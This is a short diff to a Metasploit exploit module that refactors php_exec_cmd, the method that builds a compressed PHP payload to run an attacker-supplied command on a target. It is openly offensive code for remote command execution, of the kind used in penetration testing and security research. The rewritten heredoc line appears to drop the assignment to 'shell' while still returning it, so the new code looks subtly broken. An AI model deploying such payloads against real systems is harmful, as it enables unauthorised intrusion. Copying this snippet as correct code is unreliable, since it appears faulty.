@@ -29,15 +29,15 @@ module MetasploitModule
   end
 
   def php_exec_cmd
-    cmd = Rex::Text.encode_base64(datastore['CMD'])
-    dis = '$' + Rex::Text.rand_text_alpha(4..7)
-    shell = <<-END_OF_PHP_CODE
-    #{php_preamble(disabled_varname: dis)}
-    $c = base64_decode("#{cmd}");
-    #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    # please do not copy me into new code, instead use the #php_exec_cmd method after including Msf::Payload::Php or
+    # use the PHP adapter payload by selecting any php/unix/cmd/* payload
+    vars = Rex::RandomIdentifier::Generator.new(language: :php)
+    shell <<-END_OF_PHP_CODE
+      #{php_preamble(vars_generator: vars)}
+      #{php_system_block(vars_generator: vars, cmd: datastore['CMD'])}
     END_OF_PHP_CODE
 
-    return Rex::Text.compress(shell)
+    Rex::Text.compress(shell)
   end
 
   #
